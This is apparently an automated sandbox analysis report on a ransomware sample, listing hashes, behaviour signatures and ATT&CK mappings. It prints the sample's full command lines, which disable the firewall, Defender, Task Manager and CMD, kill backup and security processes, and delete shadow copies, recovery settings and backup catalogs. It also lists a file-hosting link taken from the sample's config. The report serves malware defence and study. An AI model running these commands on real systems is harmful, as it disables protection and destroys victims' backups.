Analysis
-
max time kernel
117s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
18/09/2023, 17:29
Static task
static1
Behavioral task
behavioral1
Sample
nnll.exe
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
nnll.exe
Resource
win10v2004-20230915-en
General
-
Target
nnll.exe
-
Size
917KB
-
MD5
bd5c08142cf5d80157242c950ef85e62
-
SHA1
7b4657f833fd25f579bfc49abc42ac16e9bff697
-
SHA256
dd595da7ed62a415d319d4903c62312bf52e10603b54c2051b45c6ca955606a3
-
SHA512
c48b348cc9e606622a259cf6fa18f975866ab36036b546fe92551a3ae4bd510e2baf64a4cbdf4b7c09fc6f3f7b9fa949847d92766bd9d0261b0517d0b8d9c9db
-
SSDEEP
24576:o8m657w6ZBLmkitKqBCjC0PDgM5AH5DT+j:MVV1BCjBEDT
Malware Config
Extracted
C:\Users\Admin\Downloads\_Readme.txt
https://we.tl/t-O0PCajl3M8
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Disables Task Manager via registry modification
-
Modifies Windows Firewall 1 TTPs 5 IoCs
pid Process 2792 netsh.exe 624 netsh.exe 1132 netsh.exe 2976 netsh.exe 1596 netsh.exe -
Loads dropped DLL 4 IoCs
pid Process 1708 nnll.exe 1708 nnll.exe 1708 nnll.exe 1708 nnll.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Windows\CurrentVersion\Run\discord = "C:\\Users\\Admin\\AppData\\Local\\discord.exe" nnll.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1960 vssadmin.exe -
Kills process with taskkill 42 IoCs
pid Process 2336 taskkill.exe 2352 taskkill.exe 2768 taskkill.exe 1564 taskkill.exe 1376 taskkill.exe 2220 taskkill.exe 2980 taskkill.exe 2940 taskkill.exe 948 taskkill.exe 700 taskkill.exe 1792 taskkill.exe 1580 taskkill.exe 1552 taskkill.exe 2564 taskkill.exe 2884 taskkill.exe 1392 taskkill.exe 2356 taskkill.exe 2612 taskkill.exe 1564 taskkill.exe 1988 taskkill.exe 2308 taskkill.exe 2856 taskkill.exe 2672 taskkill.exe 1296 taskkill.exe 2664 taskkill.exe 2768 taskkill.exe 2700 taskkill.exe 812 taskkill.exe 1040 taskkill.exe 1620 taskkill.exe 2388 taskkill.exe 1772 taskkill.exe 1204 taskkill.exe 1160 taskkill.exe 1780 taskkill.exe 2012 taskkill.exe 2120 taskkill.exe 2356 taskkill.exe 2136 taskkill.exe 2000 taskkill.exe 840 taskkill.exe 2280 taskkill.exe -
Modifies registry key 1 TTPs 2 IoCs
pid Process 2068 reg.exe 1568 reg.exe -
Opens file in notepad (likely ransom note) 3 IoCs
pid Process 2144 NOTEPAD.EXE 2336 NOTEPAD.EXE 668 NOTEPAD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1640 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1708 nnll.exe Token: SeDebugPrivilege 2768 taskkill.exe Token: SeDebugPrivilege 2336 taskkill.exe Token: SeDebugPrivilege 2940 taskkill.exe Token: SeDebugPrivilege 1564 taskkill.exe Token: SeDebugPrivilege 2700 taskkill.exe Token: SeDebugPrivilege 2884 taskkill.exe Token: SeDebugPrivilege 812 taskkill.exe Token: SeDebugPrivilege 948 taskkill.exe Token: SeDebugPrivilege 2120 taskkill.exe Token: SeDebugPrivilege 1772 taskkill.exe Token: SeDebugPrivilege 1988 taskkill.exe Token: SeDebugPrivilege 1040 taskkill.exe Token: SeDebugPrivilege 700 taskkill.exe Token: SeDebugPrivilege 2356 taskkill.exe Token: SeDebugPrivilege 2136 taskkill.exe Token: SeDebugPrivilege 2000 taskkill.exe Token: SeDebugPrivilege 840 taskkill.exe Token: SeDebugPrivilege 1620 taskkill.exe Token: SeDebugPrivilege 1564 taskkill.exe Token: SeDebugPrivilege 1640 powershell.exe Token: SeDebugPrivilege 1204 taskkill.exe Token: SeDebugPrivilege 1392 taskkill.exe Token: SeDebugPrivilege 1160 taskkill.exe Token: SeDebugPrivilege 2280 taskkill.exe Token: SeDebugPrivilege 1792 taskkill.exe Token: SeBackupPrivilege 1964 vssvc.exe Token: SeRestorePrivilege 1964 vssvc.exe Token: SeAuditPrivilege 1964 vssvc.exe Token: SeDebugPrivilege 1780 taskkill.exe Token: SeIncreaseQuotaPrivilege 2076 WMIC.exe Token: SeSecurityPrivilege 2076 WMIC.exe Token: SeTakeOwnershipPrivilege 2076 WMIC.exe Token: SeLoadDriverPrivilege 2076 WMIC.exe Token: SeSystemProfilePrivilege 2076 WMIC.exe Token: SeSystemtimePrivilege 2076 WMIC.exe Token: SeProfSingleProcessPrivilege 2076 WMIC.exe Token: SeIncBasePriorityPrivilege 2076 WMIC.exe Token: SeCreatePagefilePrivilege 2076 WMIC.exe Token: SeBackupPrivilege 2076 WMIC.exe Token: SeRestorePrivilege 2076 WMIC.exe Token: SeShutdownPrivilege 2076 WMIC.exe Token: SeDebugPrivilege 2076 WMIC.exe Token: SeSystemEnvironmentPrivilege 2076 WMIC.exe Token: SeRemoteShutdownPrivilege 2076 WMIC.exe Token: SeUndockPrivilege 2076 WMIC.exe Token: SeManageVolumePrivilege 2076 WMIC.exe Token: 33 2076 WMIC.exe Token: 34 2076 WMIC.exe Token: 35 2076 WMIC.exe Token: SeDebugPrivilege 1376 taskkill.exe Token: SeIncreaseQuotaPrivilege 2076 WMIC.exe Token: SeSecurityPrivilege 2076 WMIC.exe Token: SeTakeOwnershipPrivilege 2076 WMIC.exe Token: SeLoadDriverPrivilege 2076 WMIC.exe Token: SeSystemProfilePrivilege 2076 WMIC.exe Token: SeSystemtimePrivilege 2076 WMIC.exe Token: SeProfSingleProcessPrivilege 2076 WMIC.exe Token: SeIncBasePriorityPrivilege 2076 WMIC.exe Token: SeCreatePagefilePrivilege 2076 WMIC.exe Token: SeBackupPrivilege 2076 WMIC.exe Token: SeRestorePrivilege 2076 WMIC.exe Token: SeShutdownPrivilege 2076 WMIC.exe Token: SeDebugPrivilege 2076 WMIC.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 1708 nnll.exe 2144 NOTEPAD.EXE -
Suspicious use of SendNotifyMessage 1 IoCs
pid Process 1708 nnll.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1708 wrote to memory of 2272 1708 nnll.exe 29 PID 1708 wrote to memory of 2272 1708 nnll.exe 29 PID 1708 wrote to memory of 2272 1708 nnll.exe 29 PID 1708 wrote to memory of 2272 1708 nnll.exe 29 PID 1708 wrote to memory of 2764 1708 nnll.exe 31 PID 1708 wrote to memory of 2764 1708 nnll.exe 31 PID 1708 wrote to memory of 2764 1708 nnll.exe 31 PID 1708 wrote to memory of 2764 1708 nnll.exe 31 PID 2272 wrote to memory of 2792 2272 cmd.exe 33 PID 2272 wrote to memory of 2792 2272 cmd.exe 33 PID 2272 wrote to memory of 2792 2272 cmd.exe 33 PID 2272 wrote to memory of 2792 2272 cmd.exe 33 PID 2764 wrote to memory of 2768 2764 cmd.exe 34 PID 2764 wrote to memory of 2768 2764 cmd.exe 34 PID 2764 wrote to memory of 2768 2764 cmd.exe 34 PID 2764 wrote to memory of 2768 2764 cmd.exe 34 PID 2764 wrote to memory of 2336 2764 cmd.exe 36 PID 2764 wrote to memory of 2336 2764 cmd.exe 36 PID 2764 wrote to memory of 2336 2764 cmd.exe 36 PID 2764 wrote to memory of 2336 2764 cmd.exe 36 PID 2764 wrote to memory of 2940 2764 cmd.exe 37 PID 2764 wrote to memory of 2940 2764 cmd.exe 37 PID 2764 wrote to memory of 2940 2764 cmd.exe 37 PID 2764 wrote to memory of 2940 2764 cmd.exe 37 PID 2764 wrote to memory of 1564 2764 cmd.exe 38 PID 2764 wrote to memory of 1564 2764 cmd.exe 38 PID 2764 wrote to memory of 1564 2764 cmd.exe 38 PID 2764 wrote to memory of 1564 2764 cmd.exe 38 PID 2764 wrote to memory of 2700 2764 cmd.exe 39 PID 2764 wrote to memory of 2700 2764 cmd.exe 39 PID 2764 wrote to memory of 2700 2764 cmd.exe 39 PID 2764 wrote to memory of 2700 2764 cmd.exe 39 PID 2764 wrote to memory of 2884 2764 cmd.exe 40 PID 2764 wrote to memory of 2884 2764 cmd.exe 40 PID 2764 wrote to memory of 2884 2764 cmd.exe 40 PID 2764 wrote to memory of 2884 2764 cmd.exe 40 PID 2764 wrote to memory of 812 2764 cmd.exe 41 PID 2764 wrote to memory of 812 2764 cmd.exe 41 PID 2764 wrote to memory of 812 2764 cmd.exe 41 PID 2764 wrote to memory of 812 2764 cmd.exe 41 PID 2272 wrote to memory of 624 2272 cmd.exe 42 PID 2272 wrote to memory of 624 2272 cmd.exe 42 PID 2272 wrote to memory of 624 2272 cmd.exe 42 PID 2272 wrote to memory of 624 2272 cmd.exe 42 PID 2272 wrote to memory of 1132 2272 cmd.exe 43 PID 2272 wrote to memory of 1132 2272 cmd.exe 43 PID 2272 wrote to memory of 1132 2272 cmd.exe 43 PID 2272 wrote to memory of 1132 2272 cmd.exe 43 PID 2764 wrote to memory of 948 2764 cmd.exe 44 PID 2764 wrote to memory of 948 2764 cmd.exe 44 PID 2764 wrote to memory of 948 2764 cmd.exe 44 PID 2764 wrote to memory of 948 2764 cmd.exe 44 PID 2272 wrote to memory of 2976 2272 cmd.exe 68 PID 2272 wrote to memory of 2976 2272 cmd.exe 68 PID 2272 wrote to memory of 2976 2272 cmd.exe 68 PID 2272 wrote to memory of 2976 2272 cmd.exe 68 PID 2764 wrote to memory of 2120 2764 cmd.exe 46 PID 2764 wrote to memory of 2120 2764 cmd.exe 46 PID 2764 wrote to memory of 2120 2764 cmd.exe 46 PID 2764 wrote to memory of 2120 2764 cmd.exe 46 PID 2272 wrote to memory of 1596 2272 cmd.exe 47 PID 2272 wrote to memory of 1596 2272 cmd.exe 47 PID 2272 wrote to memory of 1596 2272 cmd.exe 47 PID 2272 wrote to memory of 1596 2272 cmd.exe 47 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\nnll.exe"C:\Users\Admin\AppData\Local\Temp\nnll.exe"1⤵
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1708 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c netsh advfirewall set allprofiles state off & netsh advfirewall set currentprofile state off & netsh advfirewall set domainprofile state off & netsh advfirewall set privateprofile state off & netsh advfirewall set publicprofile state off & REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f & REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f & REG ADD HKCU\Software\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2 /f & powershell -Command Add-MpPreference -ExclusionExtension .exe2⤵
- Suspicious use of WriteProcessMemory
PID:2272 -
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
PID:2792
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set currentprofile state off3⤵
- Modifies Windows Firewall
PID:624
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set domainprofile state off3⤵
- Modifies Windows Firewall
PID:1132
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set privateprofile state off3⤵
- Modifies Windows Firewall
PID:2976
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set publicprofile state off3⤵
- Modifies Windows Firewall
PID:1596
-
-
C:\Windows\SysWOW64\reg.exeREG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:980
-
-
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵
- Modifies registry key
PID:1568
-
-
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2 /f3⤵
- Modifies registry key
PID:2068
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionExtension .exe3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1640
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /F /IM BackupExecAgentBrowser* & taskkill /F /IM BackupExecDiveciMediaService* & taskkill /F /IM BackupExecJobEngine* & taskkill /F /IM BackupExecManagementService* & taskkill /F /IM vss* & taskkill /F /IM sql* & taskkill /F /IM svc$* & taskkill /F /IM memtas* & taskkill /F /IM sophos* & taskkill /F /IM veeam* & taskkill /F /IM backup* & taskkill /F /IM GxVss* & taskkill /F /IM GxBlr* & taskkill /F /IM GxFWD* & taskkill /F /IM GxCVD* & taskkill /F /IM GxCIMgr* & taskkill /F /IM DefWatch* & taskkill /F /IM ccEvtMgr* & taskkill /F /IM SavRoam* & taskkill /F /IM RTVscan* & taskkill /F /IM QBFCService* & taskkill /F /IM Intuit.QuickBooks.FCS* & taskkill /F /IM YooBackup* & taskkill /F /IM YooIT* & taskkill /F /IM zhudongfangyu* & taskkill /F /IM sophos* & taskkill /F /IM stc_raw_agent* & taskkill /F /IM VSNAPVSS* & taskkill /F /IM QBCFMonitorService* & taskkill /F /IM VeeamTransportSvc* & taskkill /F /IM VeeamDeploymentService* & taskkill /F /IM VeeamNFSSvc* & taskkill /F /IM veeam* & taskkill /F /IM PDVFSService* & taskkill /F /IM BackupExecVSSProvider* & taskkill /F /IM BackupExecAgentAccelerator* & taskkill /F /IM BackupExecRPCService* & taskkill /F /IM AcrSch2Svc* & taskkill /F /IM AcronisAgent* & taskkill /F /IM CASAD2DWebSvc* & taskkill /F /IM CAARCUpdateSvc* & taskkill /F /IM TeamViewer*2⤵
- Suspicious use of WriteProcessMemory
PID:2764 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BackupExecAgentBrowser*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2768
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BackupExecDiveciMediaService*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2336
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BackupExecJobEngine*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2940
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BackupExecManagementService*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1564
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM vss*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2700
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM sql*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2884
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM svc$*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:812
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM memtas*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:948
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM sophos*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2120
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM veeam*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1772
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM backup*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1988
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM GxVss*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1040
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM GxBlr*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:700
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM GxFWD*3⤵
- Kills process with taskkill
PID:2356
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM GxCVD*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2136
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM GxCIMgr*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2000
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM DefWatch*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:840
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM ccEvtMgr*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1620
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM SavRoam*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1564
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM RTVscan*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1204
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM QBFCService*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1392
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM Intuit.QuickBooks.FCS*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1160
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM YooBackup*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2280
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM YooIT*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1792
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM zhudongfangyu*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1780
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM sophos*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1376
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM stc_raw_agent*3⤵
- Kills process with taskkill
PID:2012
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM VSNAPVSS*3⤵
- Kills process with taskkill
PID:2308
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM QBCFMonitorService*3⤵
- Kills process with taskkill
PID:2352
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM VeeamTransportSvc*3⤵
- Kills process with taskkill
PID:2220
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM VeeamDeploymentService*3⤵
- Kills process with taskkill
PID:2980
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM VeeamNFSSvc*3⤵
- Kills process with taskkill
PID:2388
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM veeam*3⤵
- Kills process with taskkill
PID:1580
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM PDVFSService*3⤵
- Kills process with taskkill
PID:1552
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BackupExecVSSProvider*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2356
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BackupExecAgentAccelerator*3⤵
- Kills process with taskkill
PID:2612
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BackupExecRPCService*3⤵
- Kills process with taskkill
PID:2856
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM AcrSch2Svc*3⤵
- Kills process with taskkill
PID:2672
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM AcronisAgent*3⤵
- Kills process with taskkill
PID:2564
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM CASAD2DWebSvc*3⤵
- Kills process with taskkill
PID:1296
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM CAARCUpdateSvc*3⤵
- Kills process with taskkill
PID:2768
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM TeamViewer*3⤵
- Kills process with taskkill
PID:2664
-
-
-
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\_Readme.txt2⤵
- Opens file in notepad (likely ransom note)
- Suspicious use of FindShellTrayWindow
PID:2144
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet2⤵PID:2976
-
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
PID:1960
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2076
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1964
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_Readme.txt1⤵
- Opens file in notepad (likely ransom note)
PID:2336
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵PID:240
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Pictures\_Readme.txt1⤵
- Opens file in notepad (likely ransom note)
PID:668
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5eb6ea81ec2689ba081c4f45fb8a2322e
SHA1c89d597126a92d91dc74320334255b2d825ab7c0
SHA256f53a4589b0ee85c8f87c13e74100c60805a81d16846f703edcb5eccf1cc63c9e
SHA5129c68a1a4daf06cb7754f08bd899f599cad92dc0957cd079aba3455b78f73dcef4880f824339c8d0b31a8f95ac5e6bf00223275ced283e6c2518c3b58c00ef6ec
-
Filesize
8B
MD54042e932af55891d81109dfada27acf4
SHA1fcd36fd7404829744115721172bd63401d933255
SHA2562b6267734a23579a9b32c4620755037502909b28868a10787f0eb6267325397b
SHA51222cb750650b22f96391bd023e6f7e4c2339ddb7b084f11e8e0671a20cf5c1fa15a02ec8f5c9a9413c4fdf0297ea6a68709f9c3f8bea5109d6352da4a7f3af2ce
-
Filesize
1KB
MD5eb6ea81ec2689ba081c4f45fb8a2322e
SHA1c89d597126a92d91dc74320334255b2d825ab7c0
SHA256f53a4589b0ee85c8f87c13e74100c60805a81d16846f703edcb5eccf1cc63c9e
SHA5129c68a1a4daf06cb7754f08bd899f599cad92dc0957cd079aba3455b78f73dcef4880f824339c8d0b31a8f95ac5e6bf00223275ced283e6c2518c3b58c00ef6ec
-
Filesize
1KB
MD5eb6ea81ec2689ba081c4f45fb8a2322e
SHA1c89d597126a92d91dc74320334255b2d825ab7c0
SHA256f53a4589b0ee85c8f87c13e74100c60805a81d16846f703edcb5eccf1cc63c9e
SHA5129c68a1a4daf06cb7754f08bd899f599cad92dc0957cd079aba3455b78f73dcef4880f824339c8d0b31a8f95ac5e6bf00223275ced283e6c2518c3b58c00ef6ec
-
Filesize
1KB
MD5eb6ea81ec2689ba081c4f45fb8a2322e
SHA1c89d597126a92d91dc74320334255b2d825ab7c0
SHA256f53a4589b0ee85c8f87c13e74100c60805a81d16846f703edcb5eccf1cc63c9e
SHA5129c68a1a4daf06cb7754f08bd899f599cad92dc0957cd079aba3455b78f73dcef4880f824339c8d0b31a8f95ac5e6bf00223275ced283e6c2518c3b58c00ef6ec
-
Filesize
685KB
MD5081d9558bbb7adce142da153b2d5577a
SHA17d0ad03fbda1c24f883116b940717e596073ae96
SHA256b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3
SHA5122fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511
-
Filesize
685KB
MD5081d9558bbb7adce142da153b2d5577a
SHA17d0ad03fbda1c24f883116b940717e596073ae96
SHA256b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3
SHA5122fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511
-
Filesize
685KB
MD5081d9558bbb7adce142da153b2d5577a
SHA17d0ad03fbda1c24f883116b940717e596073ae96
SHA256b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3
SHA5122fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511
-
Filesize
685KB
MD5081d9558bbb7adce142da153b2d5577a
SHA17d0ad03fbda1c24f883116b940717e596073ae96
SHA256b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3
SHA5122fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511